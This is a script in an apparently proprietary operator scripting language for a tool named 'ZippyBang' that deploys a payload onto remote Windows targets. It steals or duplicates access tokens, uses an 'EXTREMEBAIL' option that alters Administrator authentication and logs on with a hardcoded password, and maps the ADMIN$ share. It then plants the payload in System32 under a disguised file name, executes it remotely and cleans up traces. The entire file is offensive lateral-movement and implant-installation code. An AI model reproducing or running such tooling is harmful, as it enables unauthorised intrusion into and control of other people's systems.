#------------------------------------------------------ # File: ZippyBang.eps # # Performs ZippyBang deployment # # Modifications: # 12/09/02 Created. # 05/04/04 Updated for EP 3.0 # 02/02/06 A fairly large re-write. Now, it uses tokens # and has a more menu driven interface # 04/10/07 Includes EMPTYKEG and EXTREMEBAIL #------------------------------------------------------ @include "_RecordToolUse.epm"; # defaults string $version = "ZippyBang"; _RecordToolUse("ZippyBang", $version); @echo off; echo "--------------------"; echo "$version"; echo "--------------------"; if ($argc != 2) { echo "Usage: $argv[0] \r\n"; return false; } else if ($argv[1] == "?") { echo "Usage: $argv[0] \r\n"; return false; } # This is passed around as a REF parameter into many of the functions # making it a structure makes the calling of functions easier struct ZippyBangParams { string $target; string $share; string $tmpName; string $finalName; string $payload; bool $isToken; bool $emkg; string $tokenName; string $tokenHandle; string $user; string $password; bool $asOs; string $os; string $drive; # these are not so much command paramters as current state variables int $stage; bool $autoContinue; int $credCmd; } # here is our parameters ZippyBangParams @params; # add \\ to the target name if none specified @params.$target = Split("\\\\", $argv[1]); if (sizeof(@params.$target) > 1) { @params.$target = "\\\\@params.$target[1]"; } else { @params.$target = "\\\\@params.$target[0]"; } if (@params.$target == "\\\\") { echo "Invalid target (@params.$target)"; return false; } # default stuff @params.$share = "ADMIN\$"; @params.$tmpName = "MSTE57.tmp"; @params.$finalName = "Spcss32.exe"; # we've already got the default values (steps 1, 2, and 3) @params.$stage = 5; # this is close to the old style version @params.$autoContinue = true; @params.$emkg = true; #always use scheduler @params.$asOs = false; @params.$os = "scheduler"; @params.$credCmd = -1; ClearAuthentication(@params); bool $res = true; # main menu loop int $quit = 0; int $setShare = 1; int $setTempName = 2; int $setFinalName = 3; int $emptykeg = 4; int $enterPayload = 5; int $enterCred = 6; int $estabCred = 7; int $viewProc = 8; int $copyFile = 9; int $execOnTar = 10; string $commands; $commands[$quit] = "Quit"; $commands[$setShare] = "Set Share"; $commands[$setTempName] = "Set Temporary File Name"; $commands[$setFinalName] = "Set Final File Name"; $commands[$emptykeg] = "Use EMPTYKEG [Default]"; $commands[$enterPayload] = "Enter payload exe"; $commands[$enterCred] = "Enter credentials information"; $commands[$estabCred] = "..."; $commands[$viewProc] = "View target processes"; $commands[$copyFile] = "Copy file to target?"; $commands[$execOnTar] = "Execute on target?"; while(true) { echo ""; echo ""; PrintCurrentConfig(@params); echo ""; if(@params.$autoContinue) { echo "(-1). Disable automatic continue"; } else { echo "(-1). Enable automatic continue"; } int $i = 0; while($i <= @params.$stage) { # first, the special lines if($i == $estabCred) { if(@params.$credCmd > -1) { echo "($i). Stop netuse credentials"; } else { echo "($i). Establish credentials with netuse"; } } else { echo "($i). $commands[$i]"; } $i++; } int $choice = GetInput("Enter the desired option"); if($choice == -1) { if(@params.$autoContinue) { @params.$autoContinue = false; } else { @params.$autoContinue = true; } } if($choice == $quit) { $res = false; break; } if($choice > @params.$stage) { continue; } # enter the share name if($choice == $setShare) { echo ""; echo ""; if(ChangeShare(@params.$share)) { if(@params.$stage <= 1) { @params.$stage = $setTempName; } } } # the temporary file name if($choice == $setTempName) { echo ""; echo ""; if(ChangeTemporaryFileName(@params.$tmpName)) { if(@params.$stage <= $setTempName) { @params.$stage = $setFinalName; } } } # the final name on the target if($choice == $setFinalName) { echo ""; echo ""; if(ChangeFinalFileName(@params.$finalName)) { if(@params.$stage <= $setFinalName) { @params.$stage = $emptykeg; } } } # BOOL to set EMPTYKEG or use Legacy if($choice == $emptykeg) { echo ""; echo ""; ifnot(prompt "Do you want to use EMPTYKEG?") { @params.$emkg = false; } if(@params.$stage <= $emptykeg) { @params.$stage = $enterPayload; } } # enter the payload file if($choice == $enterPayload) { echo ""; echo ""; if(GetPayloadFile(@params.$payload)) { if(@params.$stage <= $enterPayload) { @params.$stage = $enterCred; } if(@params.$autoContinue) { $choice++; } } } # enter the method to authenticate if($choice == $enterCred) { echo ""; echo ""; if(GetCredentials(@params.$isToken, @params.$tokenName, @params.$tokenHandle, @params.$user, @params.$password, "Main Menu")) { if(@params.$stage <= $enterCred) { @params.$stage = $estabCred; } if(@params.$autoContinue) { $choice++; } } } if($choice == $estabCred) { echo ""; echo ""; if(EstablishCredentials(@params)) { if(@params.$stage <= $estabCred) { @params.$stage = $viewProc; } if(@params.$autoContinue) { $choice++; } } } if($choice == $viewProc) { echo ""; echo ""; if(ListRemoteProcesses(@params)) { if(@params.$stage <= $viewProc) { @params.$stage = $copyFile; } if(@params.$autoContinue) { $choice++; } } } # move the file to the target if($choice == $copyFile) { echo ""; echo ""; if(TransferToTarget(@params)) { if(@params.$stage <= $copyFile) { @params.$stage = $execOnTar; } if(@params.$autoContinue) { $choice++; } } } # execute the file on the target if($choice == $execOnTar) { echo ""; echo ""; if(ExecuteOnTarget(@params)) { echo "Successfully completed ZippyBang"; if(@params.$stage <= $execOnTar) { $res = true; break; } if(@params.$autoContinue) { $choice++; } } } } return $res; #----------------------------------------------------------------------# sub PrintCurrentConfig(REF ZippyBangParams @params) { echo ""; echo "Current Configuration:"; echo "Target : @params.$target"; if(@params.$stage > 3) { echo "Share : @params.$share"; echo "EMPTYKEG : @params.$emkg"; echo "Tmp File : @params.$tmpName"; echo "Final File : @params.$finalName"; } if(@params.$stage > 5) { echo "Payload : @params.$payload"; } if(@params.$stage > 5) { echo "Credentials"; if(@params.$isToken) { echo "\tUse Token"; echo "\t\t@params.$tokenName (@params.$tokenHandle)"; } else { echo "\tdomain\\user = @params.$user"; echo "\tpassword = @params.$password"; } } if(@params.$stage > 5) { echo "Delivery type"; if(@params.$asOs) { echo "\tExecution method: @params.$os"; } else { echo "\tUse the scheduler"; } } if(@params.$stage > 6) { echo "Credentials:"; if(@params.$isToken) { echo "\tNot necessary"; } else { if(@params.$credCmd > -1) { echo "\tEstablished in command @params.$credCmd"; } else { echo "\tNot established"; } } } return true; } #----------------------------------------------------------------------# sub ChangeShare(REF string $share) { echo "Changing target share"; echo "Current share: $share"; $share = GetInput("Enter share name"); return true; } #----------------------------------------------------------------------# sub ChangeTemporaryFileName(REF string $tmpName) { echo "Changing temporary file name"; echo "Current temporary file: $tmpName"; $tmpName = GetInput("Enter temporary file name"); return true; } #----------------------------------------------------------------------# sub ChangeFinalFileName(REF string $finalName) { echo "Changing final file name"; echo "Current final name: $finalName"; $finalName = GetInput("Enter final file name"); return true; } #----------------------------------------------------------------------# sub GetPayloadFile(REF string $file) { echo "Select the target executable"; string $tempPayload = GetInput("Enter payload exe"); ifnot(`local checkfile -name $tempPayload`) { ifnot(prompt "Payload exe ($tempPayload) does not exist -- continue anyway?") { return false; } } $file = $tempPayload; return true; } #----------------------------------------------------------------------# sub GetCredentials(REF bool $isToken, REF string $tokenName, REF string $tokenHandle, REF string $user, REF string $password, IN string $menuEscape) { echo "Set authentication information"; #credentials string $credentials; $credentials[0] = $menuEscape; $credentials[1] = "Provide Username and Password"; $credentials[2] = "Log On As User"; $credentials[3] = "Duplicate Token"; $credentials[4] = "EXTREMEBAIL"; while(true) { string $viable; string $values; ifnot(getViableTokens($viable, $values)) { echo "Unable to get current tokens"; continue; } echo ""; int $i = 0; while($i < sizeof($credentials)) { echo "($i). $credentials[$i]"; $i++; } echo "Use an existing token"; # echo "(NOTE: If you use a token, you must use the scheduler option when setting target execution method)"; int $j = 0; while($j < sizeof($viable)) { echo "($i). Use Token $viable[$j] ($values[$j])"; $i++; $j++; } int $choice = GetInput("Enter the desired option"); if($choice == 0) { return false; } # provide username and password if($choice == 1) { string $newUser; string $newPass; if(getUserPass($newUser, $newPass)) { $user = $newUser; $password = $newPass; $isToken = false; return true; } continue; } # log on as a user if($choice == 2) { string $newFull; string $newUser; string $newPass; string $newDomain; if(getUserPass($newFull, $newPass)) { if(getDomain($newFull, $newUser, $newDomain)) { string $cmd = "logonasuser -user \"$newUser\" -password \"$newPass\" -domain \"$newDomain\""; echo "Executing $cmd"; ifnot(`$cmd`) { echo "*** Unable to log on as user $newUser"; } } } continue; } if($choice == 3) { echo "Running Processes:"; @echo on; ifnot(`duplicatetoken -list`) { echo "*** Unable to list tokens"; continue; } @echo off; echo "Enter -1 to cancel"; int $id = GetInput("Enter process id"); if($id == -1) { continue; } ifnot(`duplicatetoken -duplicate $id`) { echo "*** Failed to duplicate token"; } continue; } if($choice == 4) { echo ""; echo "Modifying Authentication..."; echo ""; ifnot(`modifyauthentication -user administrator`) { echo "*** Unable to ModifyAuthentication for Administrator"; continue; } ifnot(`logonasuser -user administrator -password ZAQ!nji(`) { echo "*** Unable to logon with the special password"; continue; } continue; } # reset to deal with tokens $choice -= sizeof($credentials); if($choice < 0 || $choice > sizeof($viable)) { continue; } $isToken = true; $tokenName = $viable[$choice]; $tokenHandle = $values[$choice]; return true; } return false; } #----------------------------------------------------------------------# sub EstablishCredentials(REF ZippyBangParams @params) { if(@params.$credCmd > -1) { if(prompt "Do you want to stop the current authentication? (Command @params.$credCmd)") { if(`stop @params.$credCmd`) { echo "Stopped"; @params.$credCmd = -1; } else { echo "Failed to stop"; ifnot(prompt "Would you like to return to the main menu?") { return false; } } } } if(@params.$isToken) { echo "Using a token, you do not need to establish credentials"; return true; } echo "You may need to authenticate credentials against the target."; echo "In certain situations, authentication is required."; ifnot(prompt "Would you like to authenticate your credentials (using netuse)?") { return true; } return EstabCred(@params); } #----------------------------------------------------------------------# sub ListRemoteProcesses(REF ZippyBangParams @params) { ifnot(prompt "Would you like to attempt to view the remote processes?") { return true; } bool $res = false; string $prefix = ""; if(@params.$isToken) { $prefix = "user=@params.$tokenName"; } echo " "; echo " "; @echo on; if (@params.$emkg) { $res = `$prefix emptykeg -target @params.$target\\root\\cimv2 -plist`; } else { $res = `$prefix pulist @params.$target`; } @echo off; ifnot($res) { echo "Unable to list remote processes."; #echo "This could be caused by a domain setting."; return prompt "Do you wish to ignore this impediment?"; } echo " "; echo " "; return prompt "Given these processes, do you want to continue?"; } #----------------------------------------------------------------------# sub TransferToTarget(REF ZippyBangParams @params) { echo "Transfering to target"; bool $fileExists = false; string $prefix; if(@params.$isToken) { $prefix = "user=@params.$tokenName"; } else { $prefix = ""; } string $user; string $domain; ifnot(@params.$isToken) { ifnot(getdomain(@params.$user, $user, $domain)) { return false; } } echo "Checking for temp file"; if(`checkfile -name @params.$tmpName`) { if(prompt "Temp file (@params.$tmpName) exists -- continue anyway?") { $fileExists = true; } else { return false; } } echo "Finding open drive letter"; @record on; bool $listRet = `listdrives`; @record off; @params.$drive = "Z:"; if($listRet) { string $drives = GetCmdData("drive"); bool $unknown = GetCmdData("is_drive_unknown"); int $i = sizeof($drives); while($i > 0) { $i--; if($unknown[$i] == true) { @params.$drive = $drives[$i]; break; } } #remove slash string $parts = Split("\\", @params.$drive); @params.$drive = $parts[0]; } echo " @params.$drive"; if($fileExists == false) { # put the temp file echo "Uploading payload"; ifnot(`put @params.$payload -name @params.$tmpName`) { echo "*** Failed to upload @params.$payload"; return false; } } else { echo "Proceeding using existing temporary file"; } string $netuseStart; if(@params.$isToken) { $netuseStart = "$prefix netuse"; } else { $netuseStart = "netuse -user \"$user\" -password \"@params.$password\" -domain \"$domain\""; } #map the share echo "Mapping @params.$share to @params.$drive"; string $cmd = "$netuseStart -remote \"@params.$target\\@params.$share\" -drive \"@params.$drive\" "; echo "Executing '$cmd'"; @record on; bool $res = `$cmd`; @record off; int $id = GetCmdData("LastCommandId"); ifnot($res) { echo "*** Map of @params.$target\\@params.$share failed"; if(prompt "Delete payload?") { `del @params.$tmpName`; } return false; } else { echo " MAPPED to @params.$drive"; } string $drivePath = "@params.$drive\\System32"; bool $rtn = true; # delete file from target (if it exists) if (`$prefix checkfile -name "$drivePath\\@params.$finalName"`) { `$prefix del "@params.$finalName" -path "$drivePath"`; } # copy the file to the target echo "Copying @params.$tmpName to $drivePath\\@params.$finalName"; ifnot(`$prefix copy @params.$tmpName "$drivePath\\@params.$finalName"`) { echo "*** Copy Failed"; echo " In the rare event that the copy failed because:"; echo " 1) The file existed already AND"; echo " 2) The file is actually the one you want to execute anyway"; if(prompt "Enter 'Yes' to return to the main menu. Enter 'No' to continue anyway....") { $rtn = false; } else { $rtn = true; } } # remove share echo "Removing share"; ifnot(`stop $id`) { echo "*** Remove of share failed"; $rtn = false; } else { echo " REMOVED"; } return $rtn; } #----------------------------------------------------------------------# sub ExecuteOnTarget(REF ZippyBangParams @params) { string $cmd; string $user; string $domain; ifnot(@params.$isToken) { ifnot(getdomain(@params.$user, $user, $domain)) { return false; } } string $drivePath = "@params.$drive\\System32"; bool $netuse = false; string $prefix; if(@params.$isToken) { $prefix = "user=@params.$tokenName"; } else { $prefix = ""; } string $netuseStart; if(@params.$isToken) { $netuseStart = "$prefix netuse"; } else { $netuseStart = "netuse -user \"$user\" -password \"@params.$password\" -domain \"$domain\""; } # credentials should already be authenticated.... # execute the file # use creds if(@params.$isToken) { if (@params.$emkg) { $cmd = "$prefix emkg_run @params.$finalName @params.$target"; } else { echo "Executing on target. This may take up to two minutes."; $cmd = "$prefix remoteexecute -target \"@params.$target\" -type @params.$os -command \"@params.$finalName\""; } } else { if (@params.$emkg) { $cmd = "emkg_run @params.$finalName @params.$target"; } else { echo "Executing on target This may take up to two minutes."; $cmd = "remoteexecute -target \"@params.$target\" -user \"$user\" -domain \"$domain\" -password \"@params.$password\" -type @params.$os -command \"@params.$finalName\""; } } bool $rtn = `$cmd`; if($rtn == false) { #delete the remote payload echo "Execute failed -- Mapping drive to delete payload"; string $cmd = "$netuseStart -remote \"@params.$target\\@params.$share\" -drive @params.$drive"; echo "Executing '$cmd'"; ifnot (`$cmd`) { echo "*** Map of @params.$target\\@params.$share (for deletion) failed"; } else { # mapped drive -- delete payload ifnot (`$prefix del "@params.$finalName" -path "$drivePath"`) { echo "*** Unable to delete target payload"; } else { echo " Target payload deleted"; @params.$stage--; } # unmap the drive echo "Removing shared drive @params.$drive"; ifnot (`stop netuse -contains @params.$drive`) { echo " FAILED"; } else { echo " REMOVED"; } } } ClearAuthentication(@params); echo ""; echo ""; # remove payload if (prompt "Delete payload?") { `$prefix del @params.$tmpName`; } return $rtn; } #----------------------------------------------------------------------# sub ProbeTarget(IN string $target, OUT string $suggestion, OUT bool $os) { @record on; bool $res = `machineinfo $target`; @record off; string $version = GetCmdData("os_version"); ifnot($res || defined($version)) { echo "Could not probe target - you must choose another option"; return false; } if($version == "5.2" || $version == "5.002") { $os = true; $suggestion = "2003"; echo "Machine info suggests that this target is Windows 2003"; } else if($version == "5.1" || $version == "5.001") { $os = true; $suggestion = "xp"; echo "Machine info suggests that this target is Windows XP"; } else if($version == "5.0" || $version == "5.000") { $os = true; $suggestion = "2000"; echo "Machine info suggests that this target is Windows 2000"; } else if($version == "4.0" || $version == "4.000") { $os = true; $suggestion = "nt4"; echo "Machine info suggests that this target is Windows NT4"; } else { $os = false; $suggestion = "scheduler"; echo "Machine info cannot determine the os ($version)."; echo "This script suggests using the scheduler"; } return true; } #----------------------------------------------------------------------# sub GetToken(REF string $tokenName, REF string $tokenHandle, IN string $menuEscape) { string $tokens; $tokens[0] = $menuEscape; $tokens[1] = "Choose a currently available token"; $tokens[2] = "Duplicate a token"; while(true) { echo ""; int $i = 0; while($i < sizeof($tokens)) { echo "($i). $tokens[$i]"; $i++; } int $choice = GetInput("Enter the desired option"); if($choice == 0) { return false; } if($choice > sizeof($tokens)) { continue; } if($choice == 1) { string $viable; string $values; ifnot(getViableTokens($viable, $values)) { echo "Unable to get current tokens"; continue; } while(true) { echo ""; echo "Current tokens:"; int $j = 0; echo "(0) Back"; while($j < sizeof($viable)) { int $k = $j; $k++; echo "($k). $viable[$j]"; $j++; } int $innerChoice = GetInput("Enter the desired option"); if($innerChoice == 0) { break; } if($innerChoice < 0 || $innerChoice > sizeof($viable)) { continue; } $innerChoice--; $tokenName = $viable[$innerChoice]; $tokenHandle = $values[$innerChoice]; return true; } } if($choice == 2) { echo "Here are the running processes:"; @echo on; bool $result = `duplicatetoken -list`; @echo off; ifnot($result) { echo "Unable to review running processes"; continue; } echo "From which process do you wish to duplicate a token?"; int $procId = GetInput("Enter the process Id"); @record on; $result = `duplicatetoken -duplicate $procId`; @record off; ifnot($result) { echo "Unable to duplicate token"; continue; } echo "Token duplicated"; } } return false; } #----------------------------------------------------------------------# sub getViableTokens(REF string $token, REF string $value) { @record on; `lpgetenv`; @record off; string $envOption = GetCmdData("option"); string $envValue = GetCmdData("value"); ifnot(defined($envOption)) { echo "Unable to list tokens"; return false; } string $viableTokens; int $j = 0; int $k = 0; while($j < sizeof($envOption)) { string $temp = split("_USER_", $envOption[$j]); if(sizeof($temp) == 2) { if(strlen($temp[0]) == 0) { $token[$k] = $temp[1]; $value[$k] = $envValue[$j]; $k++; } } $j++; } return true; } #----------------------------------------------------------------------# sub getUserPass(OUT string $username, OUT string $password) { $username = GetInput("Enter username"); echo "Enter (NULL) for no password"; $password = GetInput("Enter password"); if($password == "(NULL)") { $password = ""; } return true; } #----------------------------------------------------------------------# sub getDomain(IN string $fullName, OUT string $username, OUT string $domain) { string $splitSlash = Split("\\", $fullName); string $splitAt = Split("\@", $fullName); if(sizeof($splitSlash) == 1 && sizeof($splitAt) == 1) { $username = $fullName; $domain = ""; return true; } if(sizeof($splitSlash) == 2 && sizeof($splitAt) == 2) { $username = $splitSlash[0]; $domain = $splitSlash[1]; if($domain == "localhost") { $domain = ""; } return false; } if(sizeof($splitSlash) == 2) { $domain = $splitSlash[0]; $username = $splitSlash[1]; if($domain == "localhost") { $domain = ""; } return true; } if(sizeof($splitAt) == 2) { $username = $splitAt[0]; $domain = $splitAt[1]; if($domain == "localhost") { $domain = ""; } return true; } $username = $fullName; $domain = ""; return false; } #----------------------------------------------------------------------# sub ClearAuthentication(REF ZippyBangParams @params) { bool $res = false; @record on; $res = `channels`; @record off; ifnot($res) { return false; } string $cmds = GetCmdData("command"); int $ids = GetCmdData("id"); int $counter = 0; while($counter < sizeof($cmds)) { string $split1 = split("netuse", $cmds[$counter]); string $split2 = split(@params.$target, $cmds[$counter]); if(sizeof($split1) > 1) { if(sizeof($split2) > 1) { echo "Stopping command $ids[$counter]"; `stop $ids[$counter]`; } } $counter++; } return true; } #----------------------------------------------------------------------# sub EstabCred(REF ZippyBangParams @params) { ifnot(ClearAuthentication(@params)) { return false; } string $domain; string $user; ifnot(getdomain(@params.$user, $user, $domain)) { return false; } string $prefix = ""; string $postfix = ""; if(@params.$isToken) { $prefix = "user=@params.$tokenName"; } else { $postfix = "-user \"$user\" -password \"@params.$password\" -domain \"$domain\""; } string $cmd = "$prefix netuse -remote \"@params.$target\\@params.$share\" $postfix"; echo "Establishing credentials via netuse"; @record on; bool $result = `$cmd`; @record off; ifnot($result) { echo "Unable to connect via netuse. Check your credentials."; pause; return false; } @params.$credCmd = GetCmdData("LastCommandId"); echo "Established."; return true; }